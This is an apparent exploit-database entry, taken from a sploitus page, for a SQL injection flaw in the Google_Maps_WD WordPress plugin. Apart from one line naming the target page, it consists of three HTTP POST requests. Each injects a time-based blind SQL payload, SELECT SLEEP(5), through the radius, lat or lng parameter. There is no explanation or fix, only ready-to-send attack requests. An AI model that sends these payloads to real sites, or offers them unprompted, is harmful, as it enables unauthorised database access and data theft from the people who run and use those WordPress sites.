Share 
## https://sploitus.com/exploit?id=WPEX-ID:33AB1FE2-6611-4F43-91BA-52C56F02ED56
Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed

POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km


POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km


POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km